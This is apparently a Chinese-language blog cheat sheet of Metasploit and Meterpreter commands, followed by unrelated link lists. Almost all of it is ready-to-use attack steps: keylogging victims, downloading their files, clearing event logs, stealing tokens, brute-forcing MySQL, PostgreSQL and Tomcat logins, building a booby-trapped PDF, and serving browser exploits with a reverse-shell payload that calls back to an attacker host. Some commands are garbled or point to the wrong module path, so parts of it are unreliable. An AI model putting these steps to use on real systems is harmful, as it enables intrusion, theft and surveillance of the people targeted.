msfconsole的命令:
msfconsole
use module :这个命令允许你开始配置所选择的模块。
set optionname module :这个命令允许你为指定的模块配置不同的选项。
exploit :这个命令启动漏洞利用模块
run :这个命令启动非漏洞利用模块。
search module :这个命令允许你搜索独立模块。
help
exit


msfcli的命令:
msfcli
msfcli [PATH TO EXPLOIT] [options = value] :这是执行漏洞利用的语法。
msf -h


Meterpreter 执行实际的载荷分发和漏洞利用工作:
background :这个命令允许你在后台运行 Meterpreter 会话。这个命令也能为你带回MSF 提示符。
download :这个命令允许你从受害者机器中下载文件。
upload :这个命令允许你向受害者机器上传文件。
execute :这个命令允许你在受害者机器上运行命令。
shell :这个命令允许你在受害者机器上运行 Windows shell 提示符( 仅限于 Windows主机) 。
session -i :这个命令允许你在会话之间切换。


开始记录目标系统中用户的击键顺序:
keyscan_start

转储目标系统中用户的击键顺序。击键顺序会显示在屏幕上:
keyscan_dump

停止记录目标系统中用户的击键顺序。
keyscan_stop

删除目标系统中的文件。
del exploited.docx

清除目标系统中的事件日志。
clearav

展示运行进程的列表。
ps

杀掉受害者系统的指定进程,使用 kill [pid] 语法。
kill 6353

尝试偷取目标系统上的模拟令牌。
steal_token


msfconsole mysql
use auxiliary/scanner/mysql/mysql_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole postgresql
use auxiliary/scanner/mysql/postgres_login
show options
set RHOST 192.168.10.111
set user_file /root/Desktop/usernames.txt
set pass_file /root/Desktop/passwords.txt
exploit


msfconsole tomcat
use auxiliary/scanner/http/tomcat_mgr_login
show options
PASS_FILE meset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
USER_FILE mset /usr/share/metasploit-framework/data/wordlists/ tomcat_mgr_default_pass.txt
set RHOSTS 192.168.10.111
set RPORT 8180
exploit


msfconsole
msfconsole pdf
use exploit/windows/fileformat/adobe_pdf_embedded_exe
show options
set FILENAME evildocument.pdf
set INFILENAME /root/Desktop/willie.pdf
exploit


实现 browser_autopwn:
浏览器 Autopwn 是 Metasploit 提供的辅助模块,在受害者访问网页时,让你能够自动化对它
们的攻击。浏览器 Autopwn 在攻击之前指定客户端的指纹识别,也就是说他不会对 IE 7 尝试
利用 Firefox 的漏洞。基于它的浏览器判断,它决定最适于实施哪个漏洞利用。
msfconsole autopwn
use auxiliary/server/browser_autopwn
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.10.109
set URIPATH "filetypes"
exploit
Metasploit 会在 IP 地址 <http://[Provided IP Address]:8080> 处执行漏洞利用。
当访问者访问这个地址时, browser_autopwn 模块尝试连接用户的机器来建立远程会话。
如果成功的话,Meterpreter 会确认这个会话。使用会话命令来激活它:
session –I 1

msf、armitage的更多相关文章

  1. 形形色色的软件生命周期模型(4)——MSF、实用型

    摘要: 读大学时,我们曾经学习过不少软件生命周期模型,当时还不是很懂软件开发,你可能会觉得这些东西很新奇.在实际工作中,你会发现这些模型其实很难应用,与此同时你会接触到RUP.MSF等权威软件公司的生 ...

  2. Cobaltstrike、armitage联动

    i 春秋作家:fengzi 原文来自:Cobaltstrike.armitage联动 在使用Cobaltstrike的时候发现他在大型或者比较复杂的内网环境中,作为内网拓展以及红队工具使用时拓展能力有 ...

  3. 第一次亲密接触MSF

    第一次亲密接触MSF Metasploit Framework介绍 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新.被安全社区冠以“可以黑掉整个宇宙”之名的强 ...

  4. MSF基础攻击实践报告

    MSF基础攻击实践 MSF的六个模块:exploit,encoder,payload,aux,post,nops exploit——渗透攻击模块 测试者利用它来攻击一个系统,程序,或服务,以获得开发者 ...

  5. 现代软件工程 第七章 【MSF】练习与讨论

    7.7  移山开发方法——比TFS敏捷更精简 几个软件学院的学生来请教阿超,同学们自豪地说,我们要用全套TFS敏捷开发模式开发项目! 真的?阿超不敢相信. 同学: 对!我们要用全5个工作项类型 – 任 ...

  6. 2018-2019 2 20165203 《网络对抗技术》Exp5 MSF基础

    2018-2019 2 20165203 <网络对抗技术>Exp5 MSF基础 实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: ...

  7. Metasploit 笔记

    目录一.名词解释···································································· 3二.msf基础··············· ...

  8. 《Metasploit渗透测试魔鬼训练营》第一章读书笔记

    第1章 魔鬼训练营--初识Metasploit 20135301 1.1 什么是渗透测试 1.1.1 渗透测试的起源与定义 如果大家对军事感兴趣,会知道各国军队每年都会组织一些军事演习来锻炼军队的攻防 ...

  9. Cobalt Strike系列教程第一章:简介与安装

    Cobalt Strike是一款超级好用的渗透测试工具,拥有多种协议主机上线方式,集成了提权,凭据导出,端口转发,socket代理,office攻击,文件捆绑,钓鱼等多种功能.同时,Cobalt St ...

随机推荐

  1. AOP 动态织入的.NET实现

    AOP(面向切面编程:Aspect Oriented Programming)为诸如日志记录.性能统计.安全控制.事务处理.异常处理等与具体业务逻辑无关,却需要在全局范围进行执行的功能提供了一种良好重 ...

  2. SpringBoot+rest接口+swagger2生成API文档+validator+mybatis+aop+国际化

    代码地址:JillWen_SpringBootDemo mybatis 1. 添加依赖: <dependency> <groupId>org.mybatis.spring.bo ...

  3. CentOS7.6安装稳定版Nginx

    官网地址:http://nginx.org/en/linux_packages.html#RHEL-CentOS 需先安装依赖:sudo yum install -y yum-utils 安装开始: ...

  4. Asp.net 的工作原理

     转:http://www.cnblogs.com/linjiancun/archive/2010/09/14/1825662.html 1.1.1          Asp.net 的工作原理 ...

  5. centos 和KVM安装

  6. SQL中Like语句的语法

    在SQL结构化查询语言中,LIKE语句有着至关重要的作用. LIKE语句的语法格式是:select * from 表名 where 字段名 like 对应值(子串),它主要是针对字符型字段的,它的作用 ...

  7. Spring 学习记录4 ResourceLoader

    ResourceLoader Spring的ApplicationContext继承了ResourceLoader接口.这个接口主要就是可以加载各种resource.. 接口还是比较简单的: /* * ...

  8. 如何有效地学习《空中英语教室》&《彭蒙惠英语》

    读者定位: <大家说英语>是学习美式口语入门书,内容全部是情境会话,定位为“初级美式生活会话”. <空中英语教室>以浅显英语提供从新闻.旅游到时尚等流行话题,丰富会话材料,定位 ...

  9. postman的使用方法详解

    Collections:在Postman中,Collection类似文件夹,可以把同一个项目的请求放在一个Collection里方便管理和分享,Collection里面也可以再建文件夹.如果做API文 ...

  10. notepad++正则表达式删除所有行某字符开始之前或者之后所有字符

    删除S 之后的所有字符用:s.*$ 删除S 之前的所有字符用:^.*s